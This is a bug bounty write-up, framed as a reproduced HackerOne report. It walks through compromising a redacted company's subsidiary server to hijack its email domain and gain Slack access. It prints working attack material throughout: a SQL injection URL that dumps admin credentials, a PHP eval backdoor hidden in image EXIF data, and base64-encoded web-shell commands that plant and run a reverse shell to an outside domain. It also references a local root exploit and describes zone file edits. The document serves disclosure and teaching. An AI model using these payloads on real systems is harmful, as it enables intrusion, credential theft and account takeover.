Disclaimer : Prior permissions were taken before performing heavy attacks on the targets below, you should not try this without taking prior permission.
The following was reported to a program on HackerOne, I have redacted the company name, lets call it ParentCompany. So, ParentCompany has a program on HackerOne which has a child company lets say it childcompany.com , The childcompany was not in scope of the program nor mentioned anywhere on the policy page, but hacking inside it led to something which could have a critical security impact to the company. Here is the exact report i submitted on HackerOne with some redaction :
Hello ParentCompany,
Going to the Slack url of ParentCompany : https://parentcompany.slack.com/ shows that If you have an @parentcompany.com or @childcompany.com email address, you can create an account.
The thing which interests me is the website childcompany.com, So If i am able to read emails of anything@childcompany.com i can get inside ParentCompany's Slack Team
Performing a whois search shows the organization to be ChildCompany with the nameservers ns1.childcompany.com and ns2.childcompany.com
XX.XX.XX.XX is the server ip of childcompany.com
Visiting http://XX.XX.XX.XX/ redirects to http://XX.XX.XX.XX/cgi-sys/defaultwebpage.cgi which displays :
Great Success !
Apache is working on your cPanel® and WHM™ Server
So we have cPanel running on the server ( http://XX.XX.XX.XX:2082/ ) which means that somehow if we can get access to the server we can edit the zone file and add our MX records and receive mails with the address anything@childcompany.com
So just to assume somehow we got access to the server, we still need to be root to edit the zone file of childcompany.com to add our MX Records.
Doing a nmap scan against childcompany.com shows that its running Exim smtpd 4.80 on port 26
26/tcp open smtp Exim smtpd 4.80
Exim <= 4.84-3 has a very simple local root exploit (#REF: https://www.exploit-db.com/exploits/39535/ )
Ok so we know that cPanel is running on the server and we have a local root exploit by which we can possibly modify the zone file of childcompany.com to add our MX Records Now the most important step, We need a RCE on the server
SQLi :
Visiting the website i found mostly all of the files are vulnerable to SQLi
http://www.childcompany.com/somedirectory/randomfile.php?ID=66'
A warning can be seen on the page :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/childcompany/public_html/somedirectory/randomfile.php on line 181
We also have admin panel at http://www.childcompany.com/admin/
The Following Query will fetch the credentials of admin panel :
http://www.childcompany.com/somedirectory/randomfile.php?ID=-66+union+/*!select*/+group_concat(user,0x3a,pass)+from+Login--+
which gives us :
"admin:redactedpass,admin1:redactedpass1"
We can login inside the Admin panel using the credentials admin:redactedpass. Inside the admin panel we can upload images by going to
http://www.childcompany.com/admin/redactedfile.php
So the uploader checks whether the uploaded file is a valid image or not but doesn't checks for the file extension, so we can upload a image with PHP backdoor in exif data, So I uploaded a image with <?php echo eval(base64_decode($_GET['cmd'])); ?><!-- in the comments of the image using the tool Exif Pilot.
Here is The Link to file executing the command id :
http://www.childcompany.com/somedirectory/uploads/404.php?cmd=ZWNobyBzaGVsbF9leGVjKCdpZCcpOw==
So now lets gain a backconnect shell, after trying many methods the following seems to work. We need to use a domain name instead of IP to gain the backconnect shell and firewall rules only allowed outbound connections to ports 80 and 443, Now to get the backconnect shell we need to save our backconnect payload into a file inside /tmp/ as somehow the server is blocking direct back connect through executing the command by the shell, but saving it in a file and executing the file seems to work, we can save the payload by the following command :
$dt=base64_decode("YmFzaCAtaSA+JiAvZGV2L3RjcC9teWRvbWFpbi5jb20vODAgMD4m");$fp=fopen("/tmp/1","a+");fputs($fp,$dt);fclose($fp); echo "ok";
Where YmFzaCAtaSA+JiAvZGV2L3RjcC9teWRvbWFpbi5jb20vODAgMD4m is the backconnect payload bash -i >& /dev/tcp/mydomain.com/80 0>&1 and then run it by running the command bash /tmp/1
This Saves our payload inside /tmp/1 :
http://www.childcompany.com/somedirectory/uploads/404.php?cmd=JGR0PWJhc2U2NF9kZWNvZGUoIlltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOXRlV1J2YldGcGJpNWpiMjB2T0RBZ01ENG0iKTskZnA9Zm9wZW4oIi90bXAvMSIsImErIik7ZnB1dHMoJGZwLCRkdCk7ZmNsb3NlKCRmcCk7IGVjaG8gIm9rIjs=
And then run it by visiting :
http://www.childcompany.com/somedirectory/uploads/404.php?cmd=ZWNobyBzaGVsbF9leGVjKCdiYXNoIC90bXAvMScpOw==
So we will get a backconnect and can easily gain root just by 2-3 commands :
Here is the zone file where all the DNS records are stored for the domain :
Impact
Now as we are root we can simply add our MX records of any free business email provider such as ZohoMail by editing the zone file /var/named/childcompany.com.db and then run the command rndc reload childcompany.com to update the dns records. So now we can receive mails on behalf of childcompany.com and simply request a signup link to get inside ParentCompany's Slack Team and from there view internal communications between employees and attacker can pivot further to get access to https://parentcompany.com
Regards,
Parth :)
Takeaway
You should always check if you can somehow read emails of anything@domain.com, of the domain(s) mentioned in https://companyname.slack.com/ if it allows signup through email, may it be Ticket Trick, credientials found on GitHub or hacking inside an out of scope asset (with prior permissions ofcourse), as access to a company's slack can result in gaining full access to the company's servers, sensative information etc.
Thanks Sandeep for proofreading.